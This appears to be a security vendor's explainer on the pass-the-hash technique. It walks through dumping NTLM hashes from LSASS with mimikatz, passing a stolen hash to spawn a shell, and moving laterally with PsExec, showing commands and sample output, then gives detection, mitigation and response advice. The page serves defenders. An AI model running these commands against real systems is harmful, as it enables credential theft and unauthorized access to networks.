Overview
Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-hash is a credential theft and lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLM authentication protocol to authenticate as a user with only the NTLM hash of the user’s password. The attacker is thus able to use the compromised account without ever obtaining or brute-forcing the plaintext password. Password hashes normally only change when the password itself is changed, granting the adversary significant time to abuse the compromised user(s).
How It Works
Diagram
Video Tutorial
Step 1 - Steals password hashes
There are a number of methods by which an adversary can obtain password hashes once they have gained a foothold in a network. The most common of these is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. In order for this technique to work, the adversary must have compromised administrative privileges to the computer (e.g. the user that opened their phishing email is an administrator of their workstation).
The following example shows an adversary dumping hashes from LSASS. However, it is possible to obtain password hashes in other ways, such as DCSync and extracting hashes from NTDS.dit.
Code
PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"
Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session : RemoteInteractive from 2
User Name : joed
Domain : DOMAIN
Logon Server : DC1
Logon Time : 09/07/2020 10:31:19
SID : S-1-5-21-3501040295-3816137123-30697657-1109
msv :
[00000003] Primary
* Username : joed
* Domain : DOMAIN
* NTLM : eed224b4784bb040aab50b8856fe9f02
* SHA1 : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
* DPAPI : e75e04767f812723a24f7e6d91840c1d
tspkg :
wdigest :
* Username : joed
* Domain : DOMAIN
* Password : (null)
kerberos :
* Username : joed
* Domain : domain.com
* Password : (null)
ssp :
credman :
Step 2 - Uses pass-the-hash to authenticate
Next, the adversary uses the stolen password hash and the pass-the-hash technique to authenticate as the compromised user. While this example demonstrates using the stolen password hash to launch cmd.exe, it is also possible to pass-the-hash directly over the wire to any accessible resource permitting NTLM authentication.
To pass-the-hash using mimikatz sekurlsa::pth the following parameters are specified:
/user:the compromised user’s username/domain:the FQDN of the domain if using a domain account; or, “.” if using a local account/ntlm:,/aes128:, or/aes256:the stolen NTLM, AES-128, or AES-256 password hash
Console
PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"
user : JoeD
domain : domain.com
program : cmd.exe
impers. : no
NTLM : eed224b4784bb040aab50b8856fe9f02
| PID 11560
| TID 10044
| LSA Process is now R/W
| LUID 0 ; 58143370 (00000000:0377328a)
\_ msv1_0 - data copy @ 000001AE3DDE8A30 : OK !
\_ kerberos - data copy @ 000001AE3DECE9E8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001AE3DFEC428 (32) -> null
# New CMD Window Opens
Step 3 - Accesses other resources
Next, an adversary will use their newly acquired privileges to further their objectives. Tools like PSExec may be used to execute commands on remote systems, enabling the attacker to expand their footprint and repeat the cycle of credential theft and lateral movement on an ever growing number of systems.
Console
PS> .\PSExec.exe \\server1 cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
server1
Detect
Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.
-
Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example: a user accessing a larger number of endpoints than normal; or, a user accessing endpoints for the first time.
-
In order to extract hashes from an endpoint’s
LSASS.exeprocess, the malware would need to obtain a handle with thePROCESS_VM_OPERATIONandPROCESS_VM_WRITEprivileges. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles. -
Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.
Mitigate
Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
- Remove users’ administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from
LSASS.exe. - Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential’s value to an adversary seeking to use it for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
- Randomize and store local administrator passwords using a solution like Microsoft’s Local Administrator Password Solution (LAPS). This reduces an adversary’s ability to move laterally with local accounts that share the same password.
- Do not permit local accounts to authenticate over the network. This reduces an adversary’s ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID
S-1-5-113will apply to any local account, while the SIDS-1-5-114will apply to any local account that is also a member of the local Administrators group. - Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
- Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.
Respond
Should a suspected pass-the-hash be detected, there are several actions one can take to immediately respond:
- Activate the incident response process and alert the response team.
- Reset the password for the compromised user, which causes the stolen password hash to become invalid.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities. Analyze logging to determine whether this computer is patient zero or whether the attacker pivoted to this machine from elsewhere, and whether the attacker pivoted from this machine to another.
Additional Resources
Further Reading
- Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques, Versions 1 and 2
- How to Detect Pass-the-Hash attacks
- Pass-the-hash attacks: Tools and Mitigation
- Pass-the-Hash in Windows 10
- Defeating Credential Guard